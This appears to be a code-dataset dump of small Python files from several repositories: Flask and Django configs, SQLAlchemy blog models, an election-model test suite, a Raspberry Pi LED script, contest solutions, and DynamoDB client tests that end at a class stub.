blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 2
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
69
| license_type
stringclasses 2
values | repo_name
stringlengths 5
118
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
63
| visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 2.91k
686M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 23
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 213
values | src_encoding
stringclasses 30
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 2
10.3M
| extension
stringclasses 246
values | content
stringlengths 2
10.3M
| authors
listlengths 1
1
| author_id
stringlengths 0
212
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2337dbfe31cf2f3bcaceca10f0429a098ea2c2b1
|
d59b11ac0465a430b7f7402f7928b6bd1c5bc9f1
|
/config.py
|
63e1cc63b674484defdb6ca379d035703491d7f7
|
[
"Apache-2.0",
"MIT"
] |
permissive
|
mmmika/MAX-Audio-Sample-Generator
|
c94222a701f6c6e76089687c49929623f488ea62
|
5d22b6cea0a42fe8e1a088201972baf9acbe5089
|
refs/heads/master
| 2020-03-31T12:57:56.322625
| 2018-10-05T22:34:19
| 2018-10-05T22:34:19
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 855
|
py
|
# Flask settings
DEBUG = False

# Flask-restplus settings
RESTPLUS_MASK_SWAGGER = False

# Application settings

# API metadata
API_TITLE = 'Model Asset Exchange Server'
API_DESC = 'An API for serving models'
API_VERSION = '0.1'

# default model
MODEL_NAME = 'wavegan'
DEFAULT_MODEL_PATH = 'assets/models'
MODEL_LICENSE = 'Apache2'

# generator model options and default
DEFAULT_MODEL = 'lofi-instrumentals'
MODELS = ['lofi-instrumentals', 'up', 'down', 'left', 'right', 'stop', 'go']

# Tensor names used to feed / fetch the generator graph.
INPUT_TENSOR = 'z:0'
OUTPUT_TENSOR = 'G_z:0'

# Metadata reported by the model endpoint.  The previous version called
# str.format() with arguments on templates containing no '{}' placeholders
# (e.g. 'WaveGAN audio generation model'.format(MODEL_NAME)), which is a
# silent no-op; the dead calls are removed and every value stays identical.
MODEL_META_DATA = {
    'id': MODEL_NAME.lower(),
    'name': 'WaveGAN audio generation model',
    'description': 'Generative Adversarial Network, trained using TensorFlow on spoken commands and lo-fi instrumental music',
    'type': 'audio-modeling',
    'license': MODEL_LICENSE
}
|
[
"1996anoojpatel@gmail.com"
] |
1996anoojpatel@gmail.com
|
10a528647749bc0baae12598193504377e143439
|
f834363c77fed59810549fc61d569ebbaa84de82
|
/blog/database.py
|
91fa4dfa953ee73949b6df890af45aee99db64dc
|
[] |
no_license
|
jonnyfram/blog
|
b77d8aeb5ead1fe7f7659547dc432fb4249d662f
|
db79ab174978a3517bc8143d046247d96fd32aa2
|
refs/heads/master
| 2020-04-06T04:17:25.343030
| 2017-07-06T14:37:04
| 2017-07-06T14:37:04
| 95,437,255
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,151
|
py
|
import datetime
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import Column, Integer, String, Text, DateTime
from sqlalchemy import ForeignKey
from sqlalchemy.orm import relationship
from . import app
from flask_login import UserMixin
# Build the engine from the Flask app's configured database URI and bind a
# session factory to it.
# NOTE(review): a single module-level session is shared by every importer of
# this module; that is not thread-safe under a multi-threaded server —
# confirm how requests are served before relying on it.
engine = create_engine(app.config["SQLALCHEMY_DATABASE_URI"])
Base = declarative_base()
Session = sessionmaker(bind=engine)
session = Session()
class Entry(Base):
    """A single blog post, authored by one User."""
    __tablename__ = "entries"
    id = Column(Integer, primary_key=True)
    title = Column(String(1024))
    content = Column(Text)
    # Bug fix: pass the callable itself, NOT its result.  The original code
    # used default=datetime.datetime.now(), which is evaluated once at import
    # time, stamping every row with the moment the process started instead of
    # the moment the row is inserted.
    datetime = Column(DateTime, default=datetime.datetime.now)
    author_id = Column(Integer, ForeignKey('users.id'))
class User(Base, UserMixin):
    """An author account; UserMixin supplies the flask-login interface."""
    __tablename__ = "users"
    id = Column(Integer, primary_key=True)
    name = Column(String(128))
    # Unique constraint makes the email usable as a login identifier.
    email = Column(String(128), unique=True)
    # NOTE(review): this column looks like it holds the raw password value —
    # confirm hashing happens before assignment elsewhere in the app.
    password = Column(String(128))
    # One-to-many: User.entries <-> Entry.author (via entries.author_id).
    entries = relationship("Entry", backref="author")

# Create any missing tables at import time (no-op for tables that exist).
Base.metadata.create_all(engine)
|
[
"jonnyfram@gmail.com"
] |
jonnyfram@gmail.com
|
2a5de420a068fa3e361c24ec82beef335291f181
|
527af4c3c48678d8b167cb9b23d90d57c7606dd3
|
/src/tests/test_models.py
|
927c23c7b071ebbd61d368716e1052348f0afaae
|
[
"MIT"
] |
permissive
|
PRByTheBackDoor/ElectionRunner
|
8713e398e8fc2fece65eb22e4dc5193bccac108e
|
77f822b5ac4e21fa567950a762a9595a8ca08007
|
refs/heads/master
| 2020-04-06T04:30:56.959287
| 2014-12-27T00:22:11
| 2014-12-27T00:22:11
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,443
|
py
|
# The MIT License (MIT)
#
# Copyright (c) 2014 PRByTheBackDoor
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""Provides unit tests for the ``models'' package."""
from unittest import TestCase, main
from models import Election, Constituency, Party, Candidate, Outcome
class ElectionTests(TestCase):
    """Test all public functions provided by the Election() class."""

    def setUp(self):
        pass

    def test_election(self):
        """Test the public ``add_candidate'' function provided by the
        Election() class.
        """
        el = Election()
        con1 = Constituency("test")
        con2 = Constituency("test2")
        party1 = Party("party1")
        party2 = Party("party2")
        candidate1 = Candidate("candidate1", party1, con1)
        candidate2 = Candidate("candidate2", party2, con1)
        candidate3 = Candidate("candidate3", party2, con2)
        # Adding a candidate should also register its party and constituency.
        el.add_candidate(candidate1)
        self.assertTrue(candidate1 in el.candidates)
        self.assertTrue(party1 in el.parties)
        self.assertTrue(con1 in el.constituencies)
        # Adding the same candidate a second time must be rejected.
        with self.assertRaises(AssertionError):
            el.add_candidate(candidate1)
        el.add_candidate(candidate2)
        self.assertTrue(candidate2 in el.candidates)
        self.assertTrue(party1 in el.parties)
        self.assertTrue(con1 in el.constituencies)
        self.assertEqual(len(el.candidates), 2)
        self.assertEqual(len(el.parties), 2)
        self.assertEqual(len(el.constituencies), 1)
        # A candidate in a new constituency grows the constituency set only.
        el.add_candidate(candidate3)
        self.assertTrue(candidate3 in el.candidates)
        self.assertTrue(party2 in el.parties)
        self.assertTrue(con2 in el.constituencies)
        self.assertEqual(len(el.candidates), 3)
        self.assertEqual(len(el.parties), 2)
        self.assertEqual(len(el.constituencies), 2)
class ConstituencyTests(TestCase):
    """Test all public functions provided by the Constituency() class."""

    def setUp(self):
        pass

    def test_add_candidate(self):
        """Test the public ``add_candidate'' function provided by the
        Constituency() class.
        """
        con = Constituency("test")
        con2 = Constituency("test2")
        party1 = Party("party1")
        party2 = Party("party2")
        party3 = Party("party3")
        candidate1 = Candidate("candidate1", party1, con)
        candidate2 = Candidate("candidate2", party2, con)
        candidate3 = Candidate("candidate3", party3, con2)
        candidate4 = Candidate("candidate4", party2, con)
        con.add_candidate(candidate1)
        self.assertTrue(candidate1 in con.candidates)
        self.assertEqual(len(con.candidates), 1)
        # attempt to add a candidate twice
        with self.assertRaises(AssertionError):
            con.add_candidate(candidate1)
        self.assertEqual(len(con.candidates), 1)
        self.assertEqual(len(con.parties), 1)
        con.add_candidate(candidate2)
        self.assertTrue(candidate1 in con.candidates)
        self.assertTrue(candidate2 in con.candidates)
        self.assertEqual(len(con.candidates), 2)
        self.assertEqual(len(con.parties), 2)
        # attempt to add a candidate with the wrong constituency
        with self.assertRaises(AssertionError):
            con.add_candidate(candidate3)
        self.assertEqual(len(con.candidates), 2)
        # attempt to add a candidate with the same party
        # (a party may only field one candidate per constituency)
        with self.assertRaises(AssertionError):
            con.add_candidate(candidate4)
        self.assertEqual(len(con.candidates), 2)
class OutcomeTests(TestCase):
    """Exercise the public interface of the Outcome() class."""

    def setUp(self):
        pass

    def test_add_winner(self):
        """Check that ``add_winner'' records each winning candidate
        exactly once.
        """
        seat_a = Constituency("test")
        seat_b = Constituency("test2")
        first_party = Party("party1")
        second_party = Party("party2")
        winner = Candidate("candidate1", first_party, seat_a)
        other = Candidate("candidate2", second_party, seat_b)
        outcome = Outcome()
        outcome.add_winner(winner)
        self.assertIn(winner, outcome.winners)
        self.assertEqual(1, len(outcome.winners))
        # Registering the same candidate a second time must be rejected.
        with self.assertRaises(AssertionError):
            outcome.add_winner(winner)
# Allow running this module directly: python test_models.py
if __name__ == '__main__':
    main()
|
[
"oghm2-github@srcf.net"
] |
oghm2-github@srcf.net
|
e0cd1ebb5f222778682b48bf62bdbed9a7a2faef
|
3439c585e5f06ddf17c5690a07f0800c4372531d
|
/scripts/led.py
|
0be798fe4ac0e13cba93f3c9ce51fe1cc1bc6121
|
[] |
no_license
|
squidsoup/young-coders-2016
|
f24b9a2ee13c6b24d46f80f63ba8a548ef1698d4
|
b4b757dfd6414aa0ae9ec38fdf07ee6224475a1d
|
refs/heads/master
| 2020-07-08T20:49:13.182804
| 2017-04-11T23:35:38
| 2017-04-11T23:35:38
| 67,831,536
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 185
|
py
|
import RPi.GPIO as GPIO
import time
# Use physical board pin numbering and configure pin 7 as an output.
GPIO.setmode(GPIO.BOARD)
GPIO.setup(7,GPIO.OUT)
# Blink forever: toggle pin 7 once per second (0.5 s low, 0.5 s high).
# NOTE(review): whether False lights or darkens the LED depends on the
# wiring (active-low vs active-high) — cannot tell from this script alone.
while True:
    GPIO.output(7,False)
    time.sleep(0.5)
    GPIO.output(7,True)
    time.sleep(0.5)
|
[
"kit@nocturne.net.nz"
] |
kit@nocturne.net.nz
|
233695bb1c57dade93d46c11765d5914bc3e29e0
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03039/s199470028.py
|
5afbcf0436e1e2a41276ee67cfaa4072153695af
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 673
|
py
|
from itertools import combinations
def solve(N, M, K):
    """Return sum over all axis offsets of d*(N-d)*M^2 + d*(M-d)*N^2.

    Presumably the total pairwise cell-distance of an N x M grid — verify
    against the caller.  ``K`` is accepted for signature compatibility but
    is not used by this computation.
    """
    row_part = sum(dx * (N - dx) for dx in range(N)) * M * M
    col_part = sum(dy * (M - dy) for dy in range(M)) * N * N
    return row_part + col_part
def main():
    # N, M: grid dimensions; K: number of cells to choose.
    N, M, K = map(int, input().split())
    g1 = [1, 1]       # factorial table mod `mod` (built but not read below)
    g2 = [1, 1]       # inverse-factorial table (built but not read below)
    inverse = [0, 1]  # modular inverses: inverse[i] == i^-1 (mod `mod`)
    mod = 10 ** 9 + 7
    for i in range(2, N * M):
        g1.append((g1[-1] * i) % mod)
        # Standard recurrence: inv(i) = -(mod // i) * inv(mod % i)  (mod mod)
        inverse.append((-inverse[mod % i] * (mod // i)) % mod)
        g2.append((g2[-1] * inverse[-1]) % mod)
    # Start from the K = 2 value, then extend to K chosen cells by
    # multiplying factors (N*M - k) / (k - 1) modulo `mod`.
    t = solve(N, M, 2)
    for k in range(2, K):
        t = t * (N * M - k) * inverse[k - 1] % mod
    print(t)
main()
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
6aa35f7716f196962697548423b8318a68aeb789
|
981e6d9d34a91852407d45c4b7863779e228a516
|
/venv/bin/django-admin.py
|
92b413158aeac93a5d38ab2670da12a6bbeeaa4c
|
[] |
no_license
|
starwayagency/astrolabium_viber_bot
|
5062ffcb7b35b3608f9434fd486e5806e9084ae1
|
ec4e699bbc32e7275da0f12d77a0ae5cf32d000e
|
refs/heads/master
| 2023-08-18T06:36:43.315701
| 2021-10-24T18:04:31
| 2021-10-24T18:04:31
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 710
|
py
|
#!/home/jurgeon/projects/astrolabium/astrolabium_viber_bot/venv/bin/python3
# When the django-admin.py deprecation ends, remove this script.
import warnings
from django.core import management
# django-admin.py was removed in Django 4.0; this shim exists only for the
# deprecation window (Django 3.1 -> 4.0).  If RemovedInDjango40Warning no
# longer exists we are on Django >= 4.0 and the script must be deleted.
try:
    from django.utils.deprecation import RemovedInDjango40Warning
except ImportError:
    raise ImportError(
        'django-admin.py was deprecated in Django 3.1 and removed in Django '
        '4.0. Please manually remove this script from your virtual environment '
        'and use django-admin instead.'
    )

if __name__ == "__main__":
    # Warn on every direct invocation, then defer to the normal entry point.
    warnings.warn(
        'django-admin.py is deprecated in favor of django-admin.',
        RemovedInDjango40Warning,
    )
    management.execute_from_command_line()
|
[
"jurgeon018@gmail.com"
] |
jurgeon018@gmail.com
|
54348e0bd8926ccdffa383c51db801b380d5f575
|
428f2c48d6e9dabc3ac63012d4146b98bc38efc1
|
/refresh/refresh/wsgi.py
|
5f348f3bcbf706c24a9dad495e9bb99837caa19e
|
[] |
no_license
|
Arange-code/Django-project
|
f96d61fcebe0aa93bd311f86fe0a0f539b0b68f5
|
53527d1f442d87f8ac8f37d0c544168670e054cf
|
refs/heads/master
| 2021-02-05T12:29:56.201975
| 2020-02-28T14:31:58
| 2020-02-28T14:31:58
| 243,780,561
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 391
|
py
|
"""
WSGI config for refresh project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
# Default to the project's settings module unless the environment already
# provides one, then expose the WSGI callable that servers look up.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'refresh.settings')
application = get_wsgi_application()
|
[
"you@example.com"
] |
you@example.com
|
8ed5e9e3a463510b06a68a5076cb0cca96428c2a
|
65930b71495a028bb4a78f6c07a0e0e971aa503d
|
/mobee/new/migrations/0004_auto_20210905_2353.py
|
8fc2245611c23d97033458315b173cfb333ba354
|
[] |
no_license
|
sangmu1126/mobee
|
6111bd3287d9669ab61c2c8f805f0673194bf78a
|
a801abfcf65d1597a4eb281b88972945658f66fa
|
refs/heads/master
| 2023-07-18T08:51:00.396757
| 2021-09-05T15:54:46
| 2021-09-05T15:54:46
| 403,346,408
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 593
|
py
|
# Generated by Django 3.2.7 on 2021-09-05 14:53
from django.db import migrations, models
class Migration(migrations.Migration):
    # Adds two nullable CharFields to the `movie` model.
    # NOTE(review): a `password` column on a movie row looks unusual —
    # confirm it is intentional before building on it.

    dependencies = [
        ('new', '0003_rename_restaurant_review_movie'),
    ]

    operations = [
        migrations.AddField(
            model_name='movie',
            name='image',
            field=models.CharField(default=None, max_length=500, null=True),
        ),
        migrations.AddField(
            model_name='movie',
            name='password',
            field=models.CharField(default=None, max_length=20, null=True),
        ),
    ]
|
[
"sangmu1126@gmail.com"
] |
sangmu1126@gmail.com
|
0b48da007baa45e59cf83c9b05f368505db68388
|
3d231cc28740289606b44b358edf33819dc89682
|
/Hacker_rank/hacker_rank_average.py
|
290785d57b22d2af3125d096199b8cba13fd8684
|
[] |
no_license
|
byuvraj/Solution_for_python_challanges
|
f49f031c89e5bb65a80ae6dd2dfbbb3a0b143e25
|
d41e92c5cf93bed3265ff7ec26f8d8d34f149297
|
refs/heads/main
| 2023-08-18T19:41:59.350427
| 2021-10-14T10:53:09
| 2021-10-14T10:53:09
| 373,757,156
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 418
|
py
|
if __name__ == '__main__':
n = int(input())
student_marks = {}
for _ in range(n):
name, *line = input().split()
scores = list(map(float, line))
student_marks[name] = scores
query_name = input()
marks = student_marks[query_name]
avg=0
print(marks)
n_ =len(marks)
for i in range(0,n_):
avg=marks[i]+avg
avg = avg/n_
print("{0:.2f}".format(avg))
|
[
"byuvaj0202@gmail.com"
] |
byuvaj0202@gmail.com
|
26f47532449dbed8b39096a83f8cc42ae7de4c34
|
4dbe3b1b2af3ff77e8086ec32ab58dcf47849a3e
|
/tests/__init__.py
|
50530a34b837af8bd1a04e3a510f33988b96846e
|
[
"MIT"
] |
permissive
|
mnpk/dynamo3
|
b83dc700345972ea2336ac8ca842fd9f23edf5c2
|
51eacee60bdf8d058831a9ab3583a2cfe9f91ca9
|
refs/heads/master
| 2021-01-16T21:54:32.089114
| 2016-04-30T00:53:55
| 2016-04-30T00:53:55
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 21,985
|
py
|
""" Tests for Dynamo3 """
from __future__ import unicode_literals
import six
from botocore.exceptions import ClientError
from decimal import Decimal
from mock import patch, MagicMock, ANY
from six.moves.cPickle import dumps, loads # pylint: disable=F0401,E0611
from six.moves.urllib.parse import urlparse # pylint: disable=F0401,E0611
from dynamo3 import (DynamoDBConnection, Binary, DynamoKey, Dynamizer, STRING,
ThroughputException, Table, GlobalIndex, DynamoDBError,
Limit)
from dynamo3.result import (add_dicts, Count, Capacity, ConsumedCapacity,
ResultSet)
try:
import unittest2 as unittest # pylint: disable=F0401
except ImportError:
import unittest
if six.PY3:
unittest.TestCase.assertItemsEqual = unittest.TestCase.assertCountEqual
def is_number(value):
    """ Return True for floats and any of six's integer types. """
    return isinstance(value, (float,) + tuple(six.integer_types))
class BaseSystemTest(unittest.TestCase):
    """ Base class for system tests """
    # Shared DynamoDBConnection; assigned by the test harness before running.
    dynamo = None

    def setUp(self):
        super(BaseSystemTest, self).setUp()
        # Clear out any pre-existing tables
        for tablename in self.dynamo.list_tables():
            self.dynamo.delete_table(tablename)

    def tearDown(self):
        super(BaseSystemTest, self).tearDown()
        # Drop every table the test created and detach all hooks so no
        # state leaks between test cases.
        for tablename in self.dynamo.list_tables():
            self.dynamo.delete_table(tablename)
        self.dynamo.clear_hooks()
class TestMisc(BaseSystemTest):
    """ Tests that don't fit anywhere else """

    def tearDown(self):
        super(TestMisc, self).tearDown()
        # Reset the flag some tests flip so later tests see the default.
        self.dynamo.default_return_capacity = False

    def test_connection_host(self):
        """ Connection can access host of endpoint """
        # urlparse raises if .host is not string-like; no assert needed.
        urlparse(self.dynamo.host)

    def test_connection_region(self):
        """ Connection can access name of connected region """
        self.assertTrue(isinstance(self.dynamo.region, six.string_types))

    def test_connect_to_region_old(self):
        """ Can connect to a dynamo region """
        conn = DynamoDBConnection.connect_to_region('us-west-1')
        self.assertIsNotNone(conn.host)

    def test_connect_to_region_creds_old(self):
        """ Can connect to a dynamo region with credentials """
        conn = DynamoDBConnection.connect_to_region(
            'us-west-1', access_key='abc', secret_key='12345')
        self.assertIsNotNone(conn.host)

    def test_connect_to_host_without_session_old(self):
        """ Can connect to a dynamo host without passing in a session """
        conn = DynamoDBConnection.connect_to_host(access_key='abc',
                                                  secret_key='12345')
        self.assertIsNotNone(conn.host)

    def test_connect_to_region(self):
        """ Can connect to a dynamo region """
        conn = DynamoDBConnection.connect('us-west-1')
        self.assertIsNotNone(conn.host)

    def test_connect_to_region_creds(self):
        """ Can connect to a dynamo region with credentials """
        conn = DynamoDBConnection.connect(
            'us-west-1', access_key='abc', secret_key='12345')
        self.assertIsNotNone(conn.host)

    def test_connect_to_host_without_session(self):
        """ Can connect to a dynamo host without passing in a session """
        conn = DynamoDBConnection.connect('us-west-1', host='localhost')
        self.assertIsNotNone(conn.host)

    @patch('dynamo3.connection.time')
    def test_retry_on_throughput_error(self, time):
        """ Throughput exceptions trigger a retry of the request """
        def call(*_, **__):
            """ Dummy service call """
            # Shape mirrors a botocore throttling error response.
            response = {
                'ResponseMetadata': {
                    'HTTPStatusCode': 400,
                },
                'Error': {
                    'Code': 'ProvisionedThroughputExceededException',
                    'Message': 'Does not matter',
                }
            }
            raise ClientError(response, 'list_tables')
        with patch.object(self.dynamo, 'client') as client:
            client.list_tables.side_effect = call
            with self.assertRaises(ThroughputException):
                self.dynamo.call('list_tables')
        # One sleep between consecutive attempts => retries - 1 sleeps total.
        self.assertEqual(len(time.sleep.mock_calls),
                         self.dynamo.request_retries - 1)
        self.assertTrue(time.sleep.called)

    def test_describe_missing(self):
        """ Describing a missing table returns None """
        ret = self.dynamo.describe_table('foobar')
        self.assertIsNone(ret)

    def test_magic_table_props(self):
        """ Table magically looks up properties on response object """
        hash_key = DynamoKey('id')
        self.dynamo.create_table('foobar', hash_key=hash_key)
        ret = self.dynamo.describe_table('foobar')
        self.assertIsNotNone(ret.item_count)
        # Unknown attributes must still raise, not silently return None.
        with self.assertRaises(AttributeError):
            self.assertIsNotNone(ret.crazy_property)

    def test_magic_index_props(self):
        """ Index magically looks up properties on response object """
        index = GlobalIndex.all('idx-name', DynamoKey('id'))
        # CamelCase response keys are exposed as snake_case attributes.
        index.response = {
            'FooBar': 2
        }
        self.assertEqual(index.foo_bar, 2)
        with self.assertRaises(AttributeError):
            self.assertIsNotNone(index.crazy_property)

    def test_describe_during_delete(self):
        """ Describing a table during a delete operation should not crash """
        response = {
            'ItemCount': 0,
            'ProvisionedThroughput': {
                'NumberOfDecreasesToday': 0,
                'ReadCapacityUnits': 5,
                'WriteCapacityUnits': 5
            },
            'TableName': 'myTableName',
            'TableSizeBytes': 0,
            'TableStatus': 'DELETING'
        }
        table = Table.from_response(response)
        self.assertEqual(table.status, 'DELETING')

    def test_delete_missing(self):
        """ Deleting a missing table returns False """
        ret = self.dynamo.delete_table('foobar')
        self.assertTrue(not ret)

    def test_re_raise(self):
        """ DynamoDBError can re-raise itself if missing exc_info """
        err = DynamoDBError(400, Code='ErrCode', Message='Ouch', args={})
        try:
            err.re_raise()
            # re_raise() must not fall through to the next statement.
            self.assertTrue(False)
        except DynamoDBError as e:
            self.assertEqual(err, e)

    def test_default_return_capacity(self):
        """ When default_return_capacity=True, always return capacity """
        self.dynamo.default_return_capacity = True
        with patch.object(self.dynamo, 'call') as call:
            call().get.return_value = None
            rs = self.dynamo.scan('foobar')
            # Consume the lazy result set so the call actually happens.
            list(rs)
            call.assert_called_with('scan', TableName='foobar',
                                    ReturnConsumedCapacity='INDEXES')

    def test_list_tables_page(self):
        """ Call to ListTables should page results """
        # 120 tables exceeds the 100-per-page API limit, forcing pagination.
        hash_key = DynamoKey('id')
        for i in range(120):
            self.dynamo.create_table('table%d' % i, hash_key=hash_key)
        tables = list(self.dynamo.list_tables(110))
        self.assertEqual(len(tables), 110)

    def test_limit_complete(self):
        """ A limit with item_capacity = 0 is 'complete' """
        limit = Limit(item_limit=0)
        self.assertTrue(limit.complete)
class TestDataTypes(BaseSystemTest):
    """ Tests for Dynamo data types """

    def make_table(self):
        """ Convenience method for making a table """
        hash_key = DynamoKey('id')
        self.dynamo.create_table('foobar', hash_key=hash_key)

    def test_string(self):
        """ Store and retrieve a string """
        self.make_table()
        self.dynamo.put_item('foobar', {'id': 'abc'})
        item = list(self.dynamo.scan('foobar'))[0]
        self.assertEqual(item['id'], 'abc')
        self.assertTrue(isinstance(item['id'], six.text_type))

    def test_int(self):
        """ Store and retrieve an int """
        self.make_table()
        self.dynamo.put_item('foobar', {'id': 'a', 'num': 1})
        item = list(self.dynamo.scan('foobar'))[0]
        self.assertEqual(item['num'], 1)

    def test_float(self):
        """ Store and retrieve a float """
        self.make_table()
        self.dynamo.put_item('foobar', {'id': 'a', 'num': 1.1})
        item = list(self.dynamo.scan('foobar'))[0]
        # Dynamo numbers round-trip as Decimal; compare as float.
        self.assertAlmostEqual(float(item['num']), 1.1)

    def test_decimal(self):
        """ Store and retrieve a Decimal """
        self.make_table()
        self.dynamo.put_item('foobar', {'id': 'a', 'num': Decimal('1.1')})
        item = list(self.dynamo.scan('foobar'))[0]
        self.assertEqual(item['num'], Decimal('1.1'))

    def test_binary(self):
        """ Store and retrieve a binary """
        self.make_table()
        self.dynamo.put_item('foobar', {'id': 'a', 'data': Binary('abc')})
        item = list(self.dynamo.scan('foobar'))[0]
        self.assertEqual(item['data'].value, b'abc')

    def test_binary_bytes(self):
        """ Store and retrieve bytes as a binary """
        self.make_table()
        data = {'a': 1, 'b': 2}
        # Pickle round-trip proves arbitrary bytes survive storage intact.
        self.dynamo.put_item('foobar', {'id': 'a',
                                        'data': Binary(dumps(data))})
        item = list(self.dynamo.scan('foobar'))[0]
        self.assertEqual(loads(item['data'].value), data)

    def test_string_set(self):
        """ Store and retrieve a string set """
        self.make_table()
        item = {
            'id': 'a',
            'datas': set(['a', 'b']),
        }
        self.dynamo.put_item('foobar', item)
        ret = list(self.dynamo.scan('foobar'))[0]
        self.assertEqual(ret, item)

    def test_number_set(self):
        """ Store and retrieve a number set """
        self.make_table()
        item = {
            'id': 'a',
            'datas': set([1, 2, 3]),
        }
        self.dynamo.put_item('foobar', item)
        ret = list(self.dynamo.scan('foobar'))[0]
        self.assertEqual(ret, item)

    def test_binary_set(self):
        """ Store and retrieve a binary set """
        self.make_table()
        item = {
            'id': 'a',
            'datas': set([Binary('a'), Binary('b')]),
        }
        self.dynamo.put_item('foobar', item)
        ret = list(self.dynamo.scan('foobar'))[0]
        self.assertEqual(ret, item)

    def test_binary_equal(self):
        """ Binary should eq other Binaries and also raw bytestrings """
        self.assertEqual(Binary('a'), Binary('a'))
        self.assertEqual(Binary('a'), b'a')
        # __ne__ must agree with __eq__.
        self.assertFalse(Binary('a') != Binary('a'))

    def test_binary_repr(self):
        """ Binary repr should wrap the contained value """
        self.assertEqual(repr(Binary('a')), 'Binary(%s)' % b'a')

    def test_binary_converts_unicode(self):
        """ Binary will convert unicode to bytes """
        b = Binary('a')
        self.assertTrue(isinstance(b.value, six.binary_type))

    def test_binary_force_string(self):
        """ Binary must wrap a string type """
        with self.assertRaises(TypeError):
            Binary(2)

    def test_bool(self):
        """ Store and retrieve a boolean """
        self.make_table()
        self.dynamo.put_item('foobar', {'id': 'abc', 'b': True})
        item = list(self.dynamo.scan('foobar'))[0]
        self.assertEqual(item['b'], True)
        # Must come back as a real bool, not a truthy number.
        self.assertTrue(isinstance(item['b'], bool))

    def test_list(self):
        """ Store and retrieve a list """
        self.make_table()
        self.dynamo.put_item('foobar', {'id': 'abc', 'l': ['a', 1, False]})
        item = list(self.dynamo.scan('foobar'))[0]
        self.assertEqual(item['l'], ['a', 1, False])

    def test_dict(self):
        """ Store and retrieve a dict """
        self.make_table()
        data = {
            'i': 1,
            's': 'abc',
            'n': None,
            'l': ['a', 1, True],
            'b': False,
        }
        self.dynamo.put_item('foobar', {'id': 'abc', 'd': data})
        item = list(self.dynamo.scan('foobar'))[0]
        self.assertEqual(item['d'], data)

    def test_nested_dict(self):
        """ Store and retrieve a nested dict """
        self.make_table()
        data = {
            's': 'abc',
            'd': {
                'i': 42,
            },
        }
        self.dynamo.put_item('foobar', {'id': 'abc', 'd': data})
        item = list(self.dynamo.scan('foobar'))[0]
        self.assertEqual(item['d'], data)

    def test_nested_list(self):
        """ Store and retrieve a nested list """
        self.make_table()
        data = [
            1,
            [
                True,
                None,
                'abc',
            ],
        ]
        self.dynamo.put_item('foobar', {'id': 'abc', 'l': data})
        item = list(self.dynamo.scan('foobar'))[0]
        self.assertEqual(item['l'], data)

    def test_unrecognized_type(self):
        """ Dynamizer throws error on unrecognized type """
        # 'ASDF' is not a valid Dynamo type tag.
        value = {
            'ASDF': 'abc',
        }
        with self.assertRaises(TypeError):
            self.dynamo.dynamizer.decode(value)
class TestDynamizer(unittest.TestCase):
    """ Tests for the Dynamizer """

    def test_register_encoder(self):
        """ Can register a custom encoder """
        from datetime import datetime
        dynamizer = Dynamizer()
        # An encoder maps a Python type to a (dynamo type tag, value) pair.
        dynamizer.register_encoder(datetime, lambda d, v:
                                   (STRING, v.isoformat()))
        now = datetime.utcnow()
        self.assertEqual(dynamizer.raw_encode(now), (STRING, now.isoformat()))

    def test_encoder_missing(self):
        """ If no encoder is found, raise ValueError """
        from datetime import datetime
        dynamizer = Dynamizer()
        with self.assertRaises(ValueError):
            dynamizer.encode(datetime.utcnow())
class TestResultModels(unittest.TestCase):
    """ Tests for the model classes in results.py """

